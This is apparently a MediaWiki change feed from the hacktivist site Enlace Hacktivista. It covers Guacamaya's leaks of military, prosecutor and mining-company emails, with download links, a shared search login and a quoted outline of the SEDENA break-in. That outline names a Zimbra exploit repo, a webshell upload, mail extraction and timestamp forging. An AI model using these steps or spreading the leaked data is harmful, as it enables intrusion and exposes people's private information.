* [[Hacking Team]]<br />
<br />
== 2016 ==<br />
* [[Berat Albayrak Emails]]<br />
* [[Panama Papers]]<br />
* [[Surkov Leaks]]<br />
* [[Catalan police union]]<br />
<br />
== 2017 ==<br />
* [[Bob Otto emails]]<br />
* [[Cellebrite]]<br />
* [[Flexispy]]<br />
* [[Freedom Hosting II]]<br />
<br />
== 2018 ==<br />
* [[Salvini emails]]<br />
* [[Doxxing-Adventskalender]]<br />
<br />
== 2019 ==<br />
* [[GorraLeaks]]<br />
* [[Paco Leaks]]<br />
* [[Milico Leaks]]<br />
* [[Capital One]]<br />
* [[Perceptics]]<br />
* [[Cayman National Bank and Trust (Isle of Man)]]<br />
* [[Iron March]]<br />
* [[Varela Leaks]]<br />
<br />
== 2020 ==<br />
* [[Luanda Leaks]]<br />
* [[BlueLeaks]]<br />
* [[Intel exconfidential Lake]]<br />
<br />
== 2021 ==<br />
* [[Gab]]<br />
* [[Myanmar Investments]]<br />
* [[American Patriots Three Percent]]<br />
* [[Verkada]]<br />
* [[Sons of Confederate Veterans]]<br />
* [[MagaCoin]]<br />
* [[Electronic Arts]]<br />
* [[Tea Party Patriots]]<br />
* [[Cyber Partisans]]<br />
* [[HART]]<br />
* [[Policía Nacional Civil de El Salvador]]<br />
* [[Epik]]<br />
* [[Oath Keepers]]<br />
* [[America's Frontline Doctors]]<br />
* [[Twitch]]<br />
* [[Attila Hildmann]]<br />
* [[Metropolitan Police Department D.C.]]<br />
* [[Academy of Public Administration (Belarus)]]<br />
* [[AnibalLeaks]]<br />
<br />
== 2022 ==<br />
* [[Patriot Front]]<br />
* [[Belarusian Railway]]<br />
* [[Pronico]]<br />
* [[Roskomnadzor]]<br />
* [[OpRussia]]<br />
* [[Nauru Police Force]]<br />
* [[Extractivist Leaks/es]]<br />
* [[Uber]]<br />
* [[Liberty Counsel]]<br />
* [[Fiscalia|Fiscalia of Colombia]]<br />
* [[Fuerzas Represivas]]</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Enlace_Hacktivista&diff=645Enlace Hacktivista2023-01-14T01:13:56Z<p>Enlacehacktivista: /* News */</p>
<hr />
<div>Welcome to Enlace Hacktivista! This site aims to:<br />
<br />
# Document [[Hacker History|hacker history]].<br />
# [[Learn to hack|Share educational resources]] for hackers and those who want to learn.<br />
# Provide a space for hackers to publish their hacks, leaks, and [[:Category:Communiques|communiques]]. If you have something to publish, [[contact|write us]].<br />
# Publish news relevant to hackers, with a focus on supporting [[:Category:Ongoing Cases|hackers imprisoned or facing trial]]. If you know important news we should publish, [[contact|write us]].<br />
<br />
Feel free to edit the wiki! See [[Editing]]<br />
<br />
[https://twitter.com/guacamayahacks GuacamayaHacks] is a fake twitter account [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya seemingly operated by the people running anti-AMLO twitter bots.] Neither Guacamaya nor Enlace Hacktivista will ever have accounts on social networks.<br />
<br><br />
El grupo Guacamaya nunca tendrá cuentas en redes sociales. [https://twitter.com/guacamayahacks Esta cuenta] es [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsa.]<br />
<br />
== News ==<br />
<br />
* Jan 13, 2023: An anonymous whistleblower sent us phone forensics software and documentation from Cellebrite and MSAB. These companies sell to police and governments around the world who use it to collect information from the phones of journalists, activists, and dissidents. Both companies' software is well documented as being used in human rights abuses[https://www.accessnow.org/what-spy-firm-cellebrite-cant-hide-from-investors/][https://theintercept.com/2021/06/14/myanmar-msab-eu-technology-regulation/][https://cpj.org/2021/07/botswana-cellebrite-search-journalists-phone/] The leaks are available for download as torrents[https://enlacehacktivista.org/cellebrite.torrent][https://enlacehacktivista.org/MSAB.torrent] or direct download[https://files.enlacehacktivista.org/cellebrite/][https://files.enlacehacktivista.org/msab.tar.zst]<br />
* Sep 19, 2022: We've received a [https://enlacehacktivista.org/comunicado_guacamaya4.txt statement,] [https://enlacehacktivista.org/poema_guacamaya.txt poem,] and [https://enlacehacktivista.org/hackback2.webm video] to publish from the hacker group [[Guacamaya]] on their leak of military and police emails from various countries. For more information see [[Fuerzas_Represivas|here.]]<br />
* Aug 7, 2022: We've received a [https://enlacehacktivista.org/comunicado_guacamaya3.txt statement] to publish from hackers going by the name "Guacamaya", along with 5 TB of email from [https://www.opendemocracy.net/en/democraciaabierta/la-fiscal%C3%ADa-general-de-la-naci%C3%B3n-en-colombia-devorada-por-corrupci%C3%B3n-en/ Fiscalia of Colombia.] See [[Fiscalia|here]] for more information.<br />
* Aug 1, 2022: We've received a [https://enlacehacktivista.org/comunicado_guacamaya2.txt statement] to publish from hackers going by the name "Guacamaya", along with several TB of email from various mining and oil companies. The emails can be searched [https://piler.enlacehacktivista.org here,] or downloaded [https://files.enlacehacktivista.org here.] See [[Extractivist Leaks/es|here]] for more information.<br />
* Jul 21, 2022: Motivated by Liberty Counsel's legal attacks against LGBTQ and abortion rights, anonymous hackers hacked Liberty Counsel and a host of other evangelical and right-wing groups who used the same web developer. Recently while celebrating the decision to overturn Roe v Wade, Liberty Counsel's director said they [https://www.rollingstone.com/politics/politics-features/roe-supreme-court-justices-1378046/ prayed with Supreme Court justices.] A statement by the hackers is available [https://enlacehacktivista.org/libertycounsel.txt here,] and the leaked data is available as a [https://enlacehacktivista.org/libertycounsel.torrent torrent.]<br />
* May 13, 2022: Anonymous hackers sent us around 250 GB of email from REA Kaltim Plantations, a palm oil company in Indonesia. The hackers were motivated by the company's land theft and abuses towards indigenous residents, along with environmental damage. A brief description can be found [https://ejatlas.org/print/pt-rea-kaltim-plantations-in-east-kalimantan here.] The hackers would also like to give a shout out to Kecoak Elektronik. The emails are available as a [https://enlacehacktivista.org/reakaltim.torrent torrent,] or [https://files.enlacehacktivista.org/rea.co.id/ direct download.]<br />
* May 2, 2022: Nauru is a small island where Australia keeps refugees and asylum seekers in horrific conditions. By keeping them on a remote island, Australia intends to invisibilize their situation. Motivated by this, anonymous hackers sent us 55 GB of email of the island's police, along with a [https://enlacehacktivista.org/nauru.txt statement.] The mail can be downloaded as a [https://enlacehacktivista.org/nauru.torrent torrent,] or [https://files.enlacehacktivista.org/npf.gov.nr/ directly.] More information is available [[Nauru Police Force|here.]]<br />
* March 6, 2022: We've received a [https://enlacehacktivista.org/comunicado_guacamaya.txt statement] and [https://enlacehacktivista.org/hackback.webm video] to publish from hackers going by the name "Guacamaya" about their hack of the company CGN/Pronico. Pronico operates the Fenix mine in Guatemala, which has a long history of human rights abuses, environmental damage, and resistance by the surrounding communities. The video shows in detail how the hackers gained access in the company's network, downloaded emails and files, and then proceeded to sabotage the company's computers. Credits for the video's soundtrack are available [https://enlacehacktivista.org/guacamaya_soundtrack.txt here.] All the leaked files are available for download from [https://ddosecrets.com/wiki/Mining_Secrets DDoS.] Forbidden Stories [https://forbiddenstories.org/case/mining-secrets/ have just published their investigations] based on the leak. Also the company [https://pronico.gt/comunicado-oficial-de-solway-investment-group-sobre-el-cierre-definitivo-de-la-minera-en-el-estor-izabal-guatemala/ on it's website] has published a statement where they announce that sustainable mining is a lie, and call on the Guatemalan government to not only suspend their own mining license, but suspend all licenses for surface mining, as Honduras recently did. It's possible that statement was posted by the hackers and not actually by the company. More information is available on the [[Pronico]] page.<br />
<br />
<br />
[https://lists.riseup.net/www/subscribe/enlacehacktivista Subscribe to our mailing list] to get notified when news is published.</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Guacamaya&diff=638Guacamaya2022-12-11T23:03:50Z<p>Enlacehacktivista: /* Entrevistas */</p>
<hr />
<div>[[File:Guacamayas.jpeg|thumb|el colectivo]]<br />
Guacamaya es un grupo de hackers que busca la liberación de los pueblos y el territorio de Abya Yala, hasta ahora enfocándose en hackear a empresas extractivistas y fuerzas represivas (policia y militar)<br />
<br><br />
Nunca tendrán cuentas en redes sociales. [https://twitter.com/guacamayahacks Estas] [https://twitter.com/GuacamayanLeaks cuentas] son [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsas.]<br />
<br />
== Hackeos ==<br />
<br />
* [[Pronico]]<br />
* [[Extractivist Leaks/es|Extractivist Leaks]]<br />
* [[Fiscalia|Fiscalia de Colombia]]<br />
* [[Fuerzas Represivas]]<br />
<br />
== Comunicados ==<br />
* [https://enlacehacktivista.org/comunicado_guacamaya.txt Pronico]<br />
* [https://enlacehacktivista.org/comunicado_guacamaya2.txt Extractivist Leaks]<br />
* [https://enlacehacktivista.org/comunicado_guacamaya3.txt Fiscalia de Colombia]<br />
* [https://enlacehacktivista.org/comunicado_guacamaya4.txt Fuerzas Represivas]<br />
<br />
== Poemas ==<br />
* https://enlacehacktivista.org/poema_guacamaya.txt<br />
<br />
== Videos ==<br />
* [https://enlacehacktivista.org/hackback.webm Hackeo de Pronico]<br />
* [https://enlacehacktivista.org/hackback2.webm Explotación de Proxyshell] usado en todos los hackeos de [[Extractivist Leaks/es|Extractivist Leaks]], [[Fiscalia|Fiscalia de Colombia]], y [[Fuerzas Represivas]] con la excepción de [[Fuerzas Represivas#Explicación del Hackeo|Sedena.]]<br />
<br />
== Entrevistas ==<br />
* https://forbiddenstories.org/es/la-lucha-por-un-territorio-es-la-lucha-de-todas/<br />
* https://la-lista.com/mexico/2022/10/10/hackers-guacamaya-entrevista-exclusiva-con-el-grupo-hacktivista<br />
* https://www.vice.com/en/article/5d39j3/meet-the-environmental-hacktivists-trying-to-sabotage-mining-companies<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/28/hablan-hackers-revelan-que-estado-mayor-conjunto-eligio-no-reparar-falla-que-posibilito-ataque.shtml<br />
* https://loquesigue.tv/quien-esta-detras-de-los-guacamayaleaks-entrevista-al-colectivo-guacamaya/<br />
* https://www.ultimominuto.news/noticias/Entrevista-con-Guacamaya-Cual-fue-el-hallazgo-mas-importante-del-hackeo-20221016-0016.html<br />
* https://es.globalvoices.org/2022/11/30/guacamaya-el-hackeo-debe-servir-para-despertar-y-rebelarse/<br />
<br />
== Ilustraciones ==<br />
<br />
[[File:Resistencia_Milenaria.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_mina.png|400px|border|Fin de la mina]]<br />
[[File:Resistencia milenaria2.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_milicia.png|400px|border|Fin de la milicia]]<br />
<br />
<br />
[[Category:Hackers]]</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fiscalia&diff=637Fiscalia2022-12-02T23:49:35Z<p>Enlacehacktivista: /* Cobertura mediática */</p>
<hr />
<div><languages/><br />
<translate><br />
<!--T:2--><br />
El grupo hacker "Guacamaya" publicó un [https://enlacehacktivista.org/comunicado_guacamaya3.txt comunicado] junto con mas de 5 TB de correos de la Fiscalia de Colombia. Dice tener datos sensibles de muchas personas, por lo cual aclara que solo seŕa compartidos con periodistas y otras personas u organizaciones que puedan garantizar que solo van a usarlo para investigar a miembros de la Fiscalia y sus vinculos con narco trafico, militares y paramilitares entes del gobierno y empresas corruptas. Para tener acceso contacta con [[Contact|nosotros]] o [mailto:press@ddosecrets.com DDoSecrets.]<br />
</translate><br />
<br />
== Cobertura mediática ==<br />
<br />
* https://www.elespectador.com/judicial/hackeo-a-la-fiscalia-el-bunker-ha-estado-negociando-con-exdirectivos-de-odebrecht/ [https://archive.ph/sWdEl (sin paywall)]<br />
* https://www.elespectador.com/judicial/el-millonario-caso-de-corrupcion-detras-del-tramite-web-de-la-libreta-militar/<br />
* https://twitter.com/elespectador/status/1596522529006702595</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fuerzas_Represivas&diff=636Fuerzas Represivas2022-11-18T19:24:16Z<p>Enlacehacktivista: /* Cobertura mediática */</p>
<hr />
<div>Nos llega 10 TB de correos filtrados por el grupo [[Guacamaya]], esta vez de organismos militares y policiales de varios paises. Publican un [https://enlacehacktivista.org/comunicado_guacamaya4.txt comunicado] y [https://enlacehacktivista.org/poema_guacamaya.txt poema] explicando sus motivos y un [https://enlacehacktivista.org/hackback2.webm video] que muestra como se descargaron los correos de esta filtración y de las [https://enlacehacktivista.org/index.php?title=Fiscalia/en dos] [https://enlacehacktivista.org/index.php?title=Extractivist_Leaks/es anteriores.]<br />
<br />
Cabe mencionar que el grupo Guacamaya nunca tendrá cuentas en redes sociales. [https://twitter.com/guacamayahacks Esta cuenta] es [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsa.]<br />
<br />
Aparte del EMCO no hemos tenido tiempo aún revisar si contienen información personal sensible o peligrosa así que de momento están solo disponibles para periodistas y otros investigadores. Para acceso a los correos, contacta con [mailto:press@ddosecrets.com DDoSecrets]<br />
<br />
== El Estado Mayor Conjunto de las Fuerza Armadas de Chile ==<br />
<br />
Se puede descargar sus correos de: https://files.enlacehacktivista.org/emco.mil.cl/<br />
<br><br />
O como torrent de: https://files.enlacehacktivista.org/emco.mil.cl.torrent<br />
<br><br />
Hay dos archivos .zip para cada empleado, nombre.zip - que contiene los correos de su bandeja de entrada, y nombre_sent.zip - que contiene los correos de su carpeta de enviados. Dentro de cada zip estan los correos en formato .eml. Se puede usar un cliente de correo como Thunderbird con la extensión ImportExportTools NG (https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/) para importar todo los .eml<br />
<br />
También tenemos un buscador basico donde se puede ver los correos en linea: https://piler.enlacehacktivista.org/<br />
<br><br />
Con el usuario: auditor@emco.mil.cl<br />
<br><br />
y la contraseña: hunter2<br />
<br><br />
Puede que no encuentre todos los correos, si se va a hacer una investigación seria es mejor descargar todo y buscar en su computadora.<br />
<br />
Puede ser de interes para quienes investigan la militarización y ocupación del territorio Mapuche buscar por ejemplo: SITREP Araucanía<br />
<br><br />
SITREP son informes diarios de actividades militares. También puede ser de interes los correos de depani@investigaciones.cl y los informes de JENAINPOL<br />
<br />
== Secretaría de la Defensa Nacional de México (6 TB) ==<br />
<br />
Terminan sus fichas sobre líderes sociales con: <br />
<blockquote><br />
Hasta el momento no se tiene conocimiento que mantenga vínculos con integrantes de organizaciones delictivas.<br />
</blockquote><br />
SEDENA no puede decir lo mismo sobre si misma.<br />
<br><br />
No hemos tenido tiempo de investigar mucho, pero [https://enlacehacktivista.org/sedena acá] hemos subido algunos documentos que pueden ser de interés público, dónde se ve que clase de actividades la SEDENA está investigando como "amenazas a la seguridad nacional" en vez de investigar al crimen organizado y otras amenazas reales.<br />
<br />
=== Explicación del Hackeo ===<br />
Según las hackers:<br />
<blockquote><br />
Todas las demás filtraciones fueron descargadas con Proxyshell como se ve en [https://enlacehacktivista.org/hackback2.webm el video,] pero SEDENA fue con una vulnerabilidad antigua de Zimbra. Fue simplemente usar [https://github.com/Josexv1/CVE-2022-27925 esto] para explotar la vulnerabilidad y subir una webshell, y luego usar la webshell para descargar todos los correos de /opt/zimbra/store. Ya había muchas otras webshells allí, con fecha desde el 5 de Julio (la fecha puede ser facilmente cambiado con touch -t pero también esta documentado que en Julio se empezó a explotar muchos servidores de Zimbra) y vimos que otros hackers también estuvieron descargando los correos a la vez.<br />
</blockquote><br />
<br />
=== Cobertura mediática ===<br />
* https://ddosecrets.com/wiki/Secretar%C3%ADa_de_la_Defensa_Nacional_de_M%C3%A9xico#Research<br />
* https://latinus.us/2022/09/29/loret-capitulo-96/<br />
Sobre porque se publicó primero en Latinus, la guacamaya respondió:<br />
<blockquote><br />
Unos cuantos periodistas ya tenían la filtración, lo que pasa es que hacer una investigación de calidad se demora meses, Loret solo tardó unos días en encontrar algunos informes médicos de AMLO. Nos gustaría que todas tuvieran acceso a la filtración, pero en este caso no es posible, ya que hay información que en manos de narcos podría poner en riesgo a mucha gente. Sin embargo se compartió con varios periodistas de investigación, que escribieron a DDoSecrets o Enlace Hacktivista, nos guste su política y sus reportajes o no.<br />
</blockquote><br />
* https://elpais.com/mexico/2022-10-02/tengo-miedo-de-que-me-hagan-dano-los-correos-del-ejercito-mexicano-desvelan-decenas-de-abusos-sexuales-en-la-institucion.html<br />
* https://www.animalpolitico.com/2022/10/sedena-software-espia-periodistas-defensores-derechos-humanos/<br />
* https://aristeguinoticias.com/0310/mexico/sedena-nego-y-oculto-contratos-de-espionaje-pero-hackeo-evidencio-que-si-existen-periodista/<br />
* https://elpais.com/mexico/2022-10-04/el-ejercito-mexicano-investigo-a-diputados-senadores-y-gobernadores.html<br />
* https://www.sinembargo.mx/03-10-2022/4263091<br />
* https://la-lista.com/derechos-humanos/2022/10/10/guacamayaleaks-los-planes-secretos-del-ejercito-para-cerrar-el-caso-ayotzinapa<br />
* https://contralacorrupcion.mx/la-secreta-operacion-limpieza-del-ejercito-en-el-caso-ayotzinapa/<br />
* https://www.proceso.com.mx/nacional/2022/10/5/sedena-leaks-el-ejercito-autor-de-la-reforma-para-controlar-la-guardia-nacional-294665.html<br />
* https://causanatura.org/periodismo-cn/con-pena-nieto-y-amlo-sedena-monitoreo-a-opositores-al-fracking-en-la-huasteca-de-san-luis-potosi<br />
* https://twitter.com/isagvh/status/1577875084278112259<br />
* https://www.youtube.com/watch?v=OyNpRrhgHJQ<br />
* https://undergroundperiodismo.com/entrega-sre-a-la-sedena-reportes-internos-sobre-simpatizantes-del-ezln-en-europa/<br />
* https://laotraopinion.com.mx/guacamaya-leaks-las-fiestas-privadas-de-la-sedena-con-abusos-sexuales/<br />
* https://lahojadelpueblo2022.blogspot.com/2022/10/el-ejercito-le-seguia-los-pasos-al.html<br />
* https://www.proceso.com.mx/nacional/2022/11/6/cndh-estalla-por-reportaje-de-proceso-que-revela-ordenes-de-la-sedena-sobre-caso-ayotzinapa-296486.html<br />
* https://lasillarota.com/nacion/2022/11/11/guacamaya-leaks-sedena-pidio-zaldivar-suavizar-jueces-por-delitos-de-militares-401304.html<br />
<br />
== Otros ==<br />
<br />
* Policía Nacional Civil de El Salvador (4 TB, @pnc.gob.sv)<br />
* Comando General de las Fuerzas Militares de Colombia (275 GB, @cgfm.mil.co)<br />
* Fuerza Armada de El Salvador (50 GB, @faes.gob.sv)<br />
* Comando Conjunto de las Fuerzas Armadas de Peru (35 GB, @ccffaa.mil.pe)<br />
* Ejercito del Peru (70 GB, @ejercito.mil.pe)<br />
<br />
== Arte ==<br />
<br />
Ilustraciones del [https://enlacehacktivista.org/hackback2.webm video] que muestra el hackeo. La banda sonora del video se puede encontrar [https://enlacehacktivista.org/guacamaya_soundtrack2.txt aquí.]<br />
<br />
[[File:Resistencia milenaria2.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_milicia.png|400px|border|Fin de la milicia]]<br />
<br />
== Cobertura mediática ==<br />
<br />
=== Chile ===<br />
* https://resumen.cl/articulos/hackeo-armada-espio-vecinos-recolectaban-leche-ninos-pandemia<br />
* https://resumen.cl/articulos/grupos-ambientales-del-biobio-en-la-mira-del-ejercito-organizaciones-contra-la-central-rucalhue-y-coordinadora-chorera-forman-parte-de-documentos-hackeados-a-las-fuerzas-armadas<br />
* https://resumen.cl/articulos/hackeo-a-correos-del-ejercito-revelo-que-espiaban-a-las-juventudes-comunistas-a-traves-de-redes-sociales<br />
* https://resumen.cl/articulos/hackeo-filtra-que-armada-ha-gastado-mas-de-690-millones-en-estados-de-excepcion-en-el-biobio-148-millones-solo-en-viaticos-viaticos-y-gratificaciones<br />
* https://interferencia.cl/articulos/mails-hackeados-informes-del-emco-recomendaron-familias-castrenses-estar-abastecidas-al<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/22/correos-del-estado-mayor-conjunto-develan-temor-a-otro-catrillanca-y-debilidad-de-inteligencia.shtml<br />
* https://www.t13.cl/noticia/ex-ante/politica/filtracion-correos-militares-informe-efectos-detener-al-vocero-profugo-temucuicui<br />
* https://www.ciperchile.cl/2022/09/22/hackeo-masivo-al-estado-mayor-conjunto-expuso-miles-de-documentos-de-areas-sensibles-de-la-defensa/<br />
* https://www.biobiochile.cl/noticias/nacional/chile/2022/09/22/filtracion-de-correos-general-paiva-presenta-su-renuncia-a-jefatura-de-estado-mayor-conjunto.shtml<br />
* https://resumen.cl/articulos/pdi-investigaba-a-grupo-que-organizaba-recitales-poeticos-y-juntaba-dinero-para-revista-literaria-segun-documentos-filtrados-por-hackers<br />
* https://resumen.cl/articulos/autoridades-electas-del-biobio-eran-espiadas-por-fuerzas-armadas-y-la-ani-segun-revela-filtracion-hacker<br />
* https://interferencia.cl/articulos/hackeo-al-emco-la-colecta-de-la-armada-para-presos-de-punta-peuco-los-youtube-de-johannes<br />
* https://resumen.cl/articulos/hackeo-a-inteligencia-de-ff-aa-y-policias-abunda-informacion-sobre-organizaciones-sociales-pero-casi-no-hay-menciones-al-crimen-organizado<br />
* https://resumen.cl/articulos/actos-y-marchas-feministas-fueron-espiadas-por-la-pdi-en-la-region-de-valparaiso-segun-documentos-hackeados-al-estado-mayor-conjunto<br />
* https://resumen.cl/articulos/archivos-hackeados-revelan-que-organizaciones-sociales-de-osorno-tambien-fueron-investigadas-por-fuerzas-armadas-y-pdi<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-informe-concluye-que-fpmr-podia-levantase-en-armas-con-apoyo-internacional-pese-a-que-organizacion-fue-desarticulada-hace-30-anos<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-actividad-por-la-nacionalizacion-del-cobre-en-que-participo-daniel-jadue-era-investigada-por-la-pdi<br />
* https://resumen.cl/articulos/editorial-el-hackeo-al-emco-y-la-persistencia-de-una-odiosa-doctrina<br />
* https://www.t13.cl/noticia/ex-ante/nacional/el-manual-guerra-irregular-colombia-general-iturriaga-compartio-emco-27-09-2022<br />
* https://resumen.cl/articulos/mails-hackeados-al-emco-muestran-que-policias-y-ffaa-espiaban-al-colegio-de-profesores-as-desde-antes-del-estallido-social<br />
* https://resumen.cl/articulos/pdi-investigaba-actividades-de-grupos-de-ciclistas-de-concepcion-revelan-documentos-hackeados<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/28/hablan-hackers-revelan-que-estado-mayor-conjunto-eligio-no-reparar-falla-que-posibilito-ataque.shtml<br />
* https://www.elclarin.cl/2022/09/27/tras-filtracion-de-correos-de-las-ff-aa-ex-miembros-del-ejercito-y-carabineros-denuncian-seguimiento-a-organizaciones-sociales/<br />
<br />
=== Peru ===<br />
* https://twitter.com/laencerronaperu/status/1578060867580690434#m<br />
<br />
=== El Salvador ===<br />
* https://elfaro.net/es/202210/el_salvador/26418/El-d%C3%ADa-en-que-inici%C3%B3-la-masacre-de-marzo-cuatro-l%C3%ADderes-nacionales-de-la-MS-13-salieron-de-Zacatecoluca.htm<br />
* https://www.elfaro.net/es/202210/el_salvador/26443/PNC-supo-de-la-liberaci%C3%B3n-ilegal-de-Crook-desde-noviembre-de-2021.htm</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Extractivist_Leaks/es&diff=635Extractivist Leaks/es2022-11-18T19:23:51Z<p>Enlacehacktivista: /* ENAMI EP */</p>
<hr />
<div>El grupo hacker "Guacamaya" publicó un [https://enlacehacktivista.org/comunicado_guacamaya2.txt comunicado] junto con mas de 2 TB de correos electronicos filtrados procedentes de varias empresas:<br />
<br />
== Quiborax ==<br />
<br />
Una minera chilena que [https://es.mongabay.com/2021/02/chile-los-impactos-no-evaluados-de-la-mineria-en-el-monumento-natural-salar-de-surire/ amenaza la vida en una area protegida.] El estado concede pequeñas reservas donde prometen respetar a la naturaleza pero sabemos<br />
que es mentira. Este sistema de muerte va siempre a intentar expandirse hasta explotar y extraer hasta el último rincón del planeta. Quedará solo lo que<br />
podemos defender, y como siempre en primera linea están los pueblos originarios, que [https://www.laizquierdadiario.cl/Corte-de-apelaciones-de-Antofagasta-ordeno-paralizar-explotacion-de-la-empresa-Quimorax-en-el-Salar ya están en lucha contra Quiborax.]<br />
<br />
== ENAMI EP ==<br />
<br />
La empresa minera estatal de Ecuador, fundado por Rafael Correa. Nos muestra una vez más que si bien los políticos de izquierda invierten algo más de las<br />
"regalias" de empresas extractivistas, en programas sociales, siguen con el mismo modelo de extración, "desarollo", usurpación de tierras indigenas, y destrución.<br />
<br />
También piden a flokinet que bajen nuestro sitio: https://blog.flokinet.is/2022/11/11/censorship-in-ecuador/<br />
<br />
== Agencia Nacional de Hidrocarburos (ANH) ==<br />
<br />
El petróleo: perforan la tierra, contaminan el agua, el aire. Para satisfacer un sistema industrial voraz en su marcha hacia el "progreso". En Colombia, la ANH es quien entrega los permisos y reparte las regalías de esta macabra marcha hacia la muerte.<br />
<br />
== New Granada Energy Corporation ==<br />
<br />
Petrolera en Colombia, filial de la Sinopec - la mas grande del mundo. Cuenta con [https://prensalibrecasanare.com/principal/6334-new-granada-energy-causu-daso-ambiental-en-paz-de-ariporo-al-derramar-crudo-en-caso-chiquito.html un derrame públicamente documentada,] sin embargo en los correos de<br />
mensajes con "Estadísticas Ambientales" en el tema, vemos que pequeños derrames ocurren cada semana.<br />
<br />
== Oryx Resources ==<br />
<br />
Petrolera Venezolana, del empresario Samark Lopez - vinculado a varios casos de corrupción. Como lo que extrae las petroleras es ganancia suya y lo que<br />
contaminan sí es problema nuestro, no podemos esperar otra que un descuido ambiental total. Los correos filtrados llegan hasta el 3 de mayo, y unos días<br />
antes el 28 de abril documentan un derrame de 175 mil litros. Menos mal que escribieron un informe dónde dicen haber intentado realizar un saneamiento del<br />
área afectada, y así quedó satisfecho el Ministerio del "Poder Popular" para el "Ecosocialismo", con un informe.<br />
<br />
== Tejucana ==<br />
<br />
Cinismo y perversidad.<br><br />
Tejucana, minera Brasileña que termina cada correo con el pie de página:<br />
<blockquote><br />
Antes de imprimir pense em sua responsabilidade<br />
e compromisso com o meio ambiente<br />
</blockquote><br />
<br />
Pensamos que las residentes de [https://www.folhadebrumadinho.com.br/noticias/meio-ambiente/mineradora-tejucana-e-interditada-pela-anm/ Brumadinho] duermen tranquila y placidamente sabiendo el gran compromiso que tiene esta empresa con el medio ambiente...<br />
hasta que vimos todo los correos a "ncopiadora" y oh! la empresa imprime bastante, y con tinta de color.<br />
<br />
== Ministerio de Ambiente y Recursos Naturales ==<br />
<br />
Los Ministerios de Ambiente son quienes, en vez de protegerlo, reparten y [https://lahora.gt/nacionales/wpcomvip/2016/02/27/marn-descontrol-corrupcion-e-impunidad-en-torno-a-los-recursos-naturales/ venden nuestra milenaria herencia a empresas privadas.] Con la utópica esperanza de que el MARN esta cumpliendo una pequeña parte de su deber de cuidar el ambiente, y el miedo de que publicar sus correos podría perjudicar eso, la guacamaya nos pide compartir sus correos solamente con periodistas, organizaciones o individuos, que puedan verificar que tienen un interes legítimo en investigar a MARN. Para acceso a sus correos, contacta con [[Contact|nosotros]] o [mailto:press@ddosecrets.com DDoSecrets]<br />
<br />
== Descargar ==<br />
<br />
Se puede buscar y ver los correos [https://piler.enlacehacktivista.org aquí,] y descargar todo [https://files.enlacehacktivista.org aquí.] El buscador lo hicimos para tener algo público y facilmente asequible, pero puede no encontrar correos. Si está haciendo una investigación seria recomendamos usar una maquína virtual aparte, descargar todo e importar todo los .eml en un cliente de correo, como por ejemplo Thunderbird con [https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/ ImportExportTools NG.]</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Extractivist_Leaks/es&diff=634Extractivist Leaks/es2022-11-18T19:23:38Z<p>Enlacehacktivista: /* ENAMI EP */</p>
<hr />
<div>El grupo hacker "Guacamaya" publicó un [https://enlacehacktivista.org/comunicado_guacamaya2.txt comunicado] junto con mas de 2 TB de correos electronicos filtrados procedentes de varias empresas:<br />
<br />
== Quiborax ==<br />
<br />
Una minera chilena que [https://es.mongabay.com/2021/02/chile-los-impactos-no-evaluados-de-la-mineria-en-el-monumento-natural-salar-de-surire/ amenaza la vida en una area protegida.] El estado concede pequeñas reservas donde prometen respetar a la naturaleza pero sabemos<br />
que es mentira. Este sistema de muerte va siempre a intentar expandirse hasta explotar y extraer hasta el último rincón del planeta. Quedará solo lo que<br />
podemos defender, y como siempre en primera linea están los pueblos originarios, que [https://www.laizquierdadiario.cl/Corte-de-apelaciones-de-Antofagasta-ordeno-paralizar-explotacion-de-la-empresa-Quimorax-en-el-Salar ya están en lucha contra Quiborax.]<br />
<br />
== ENAMI EP ==<br />
<br />
La empresa minera estatal de Ecuador, fundado por Rafael Correa. Nos muestra una vez más que si bien los políticos de izquierda invierten algo más de las<br />
"regalias" de empresas extractivistas, en programas sociales, siguen con el mismo modelo de extración, "desarollo", usurpación de tierras indigenas, y destrución.<br />
También piden a flokinet que bajen nuestro sitio: https://blog.flokinet.is/2022/11/11/censorship-in-ecuador/<br />
<br />
== Agencia Nacional de Hidrocarburos (ANH) ==<br />
<br />
El petróleo: perforan la tierra, contaminan el agua, el aire. Para satisfacer un sistema industrial voraz en su marcha hacia el "progreso". En Colombia, la ANH es quien entrega los permisos y reparte las regalías de esta macabra marcha hacia la muerte.<br />
<br />
== New Granada Energy Corporation ==<br />
<br />
Petrolera en Colombia, filial de la Sinopec - la mas grande del mundo. Cuenta con [https://prensalibrecasanare.com/principal/6334-new-granada-energy-causu-daso-ambiental-en-paz-de-ariporo-al-derramar-crudo-en-caso-chiquito.html un derrame públicamente documentada,] sin embargo en los correos de<br />
mensajes con "Estadísticas Ambientales" en el tema, vemos que pequeños derrames ocurren cada semana.<br />
<br />
== Oryx Resources ==<br />
<br />
Petrolera Venezolana, del empresario Samark Lopez - vinculado a varios casos de corrupción. Como lo que extrae las petroleras es ganancia suya y lo que<br />
contaminan sí es problema nuestro, no podemos esperar otra que un descuido ambiental total. Los correos filtrados llegan hasta el 3 de mayo, y unos días<br />
